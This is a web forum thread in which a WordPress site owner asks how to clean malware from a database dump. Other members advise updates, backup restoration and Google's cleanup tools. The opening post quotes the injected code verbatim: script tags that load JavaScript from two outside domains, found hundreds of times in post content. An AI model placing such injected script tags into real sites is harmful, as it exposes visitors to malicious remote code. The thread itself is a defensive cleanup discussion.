Welcome to WebmasterWorld Guest from 35.171.45.91

Forum Moderators: open

How remove malware from database.sql

malware, virus, phishing, database

     
9:04 pm on Mar 23, 2019 (gmt 0)

New User

5+ Year Member

joined:Aug 20, 2010
posts: 22
votes: 0


Hi folks,
I have found a malware script in my database.sql file.
As I am not a backend developer I need help with this.

Part of it is as follows, and I have now removed it from this file:

<script async src=\'https://adrequest.xyz/ad.js?t=3\' type=\'text/javascript\'></script><script async src=\'https://getmylanding.site/demo.js?t=2\' type=\'text/javascript\'></script>


There were over 700 entries of the above code, all in one line. The line started with:
INSERT INTO `wp_posts` VALUES (5,1,'2015-08-29 18:28:52','2015-08-29 18:28:52','


However, I have also found another line, starting with
INSERT INTO `wp_wfconfig` VALUES
that includes a very long string of letters and numbers.

Is this supposed to be there, or is it also part of the malware?

Thanks for reading
12:37 am on Mar 24, 2019 (gmt 0)

Senior Member

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Apr 19, 2002
posts:3511
votes: 84


i imagine you are on wordpress? ... if so the first thing to do is update to the latest version, after that check every single plugin you are using to see if there are known exploits ... if there are and they haven't been patched with an updated plugin, then uninstall the plugin.
3:17 am on Mar 24, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10558
votes: 1118


Locate date of the infection then nuke by restoring from the last valid backup. THEN update to latest and VET the plugins desired (or remove).

You do have a backup, right?
4:44 am on Mar 24, 2019 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4558
votes: 363


Google offers some help and tools for removal and repair: [support.google.com...]

Since they may flag your site for malware and not show it until it is fixed, you may need to have it re-approved: [support.google.com...]
9:53 pm on Mar 24, 2019 (gmt 0)

New User

5+ Year Member

joined:Aug 20, 2010
posts: 22
votes: 0


Hi topr8,
Thanks for replying... Yes I am on WP ... I saw the spammy link code in a report run by my security plugin Wordfence. See screenshot:
[screencast.com...]

Unlike with other issues, Wordfence couldn't fix or delete the problem, so I was left trying to figure out how to get rid of it.

I am also reluctant to delete some plugins because some are custom and were created by a Developer I hired... so, I have to be careful.
10:34 pm on Mar 24, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:15932
votes: 885


I have to be careful.
Good thinking. If you’re not careful, you might find your files infected with malware.
9:14 pm on Mar 26, 2019 (gmt 0)

New User

5+ Year Member

joined:Aug 20, 2010
posts: 22
votes: 0


Hi tangor,
Thanks for replying. Yes I do have a backup.

I managed to find one of them that was downloaded just before the malware infection.

I have now uploaded it and stripped out all the old dormant or unnecessary plugins.
I have installed and run Wordfence... and cleaned up a lot of files.

This seems to have worked.
9:46 pm on Mar 26, 2019 (gmt 0)

New User

5+ Year Member

joined:Aug 20, 2010
posts: 22
votes: 0


Thanks not2easy,
I rebuilt one of my sites, a Nutrition site, in pure HTML and CSS. It takes up a comparatively tiny amount of file space compared with the WP files.

However, G Webmaster has shown my traffic drop off to to zero. I suspect due to the pages now ending with ".html"

I will look at your web pages you've linked to and start the process of informing Google of my recent infection. I think I'll install a fresh WP and re-build it. Unfortunately I don't have a backup for the Nutrition site, but I do have the edited style.css file, so it should take long to get it resembling the WP original.
10:20 pm on Mar 26, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10558
votes: 1118


@avery123 ... that is good news! Don't forget to take an immediate snapshot of the new/revised install as soon as possible, and mark it for hold 'til the sun shines, Nellie!
10:21 pm on Mar 26, 2019 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4558
votes: 363


If your traffic has "dropped off to zero" it could be that Google has detected a security/malware problem already. If so, I believe they would let you know in GSC.

As long as you have a sitemap that shows the current URLs it should not make much difference what those URLs end with. Best practice would be to redirect the old URLs to the new versions. If your site is being frequently changed it can be difficult to get organic traffic.
10:52 pm on Mar 30, 2019 (gmt 0)

New User

5+ Year Member

joined:Aug 20, 2010
posts: 22
votes: 0


@tangor,
Thanks, I will create a backup. Just out of interest, what plugin do you recommend for this?

@not2easy,
The only warning I received from the G Webmaster area was a warning that some links or buttons were too close together for using on smartphones.
This was just after I re-uploaded the site onto a new server.
12:26 am on Mar 31, 2019 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:10558
votes: 1118


Thanks, I will create a backup. Just out of interest, what plugin do you recommend for this?


The easiest one: FTP to your local machine! Put it on removable data and put it in a lock box somewhere off site.

Others will have different suggestions. I just like to keep it simple. (KISS method)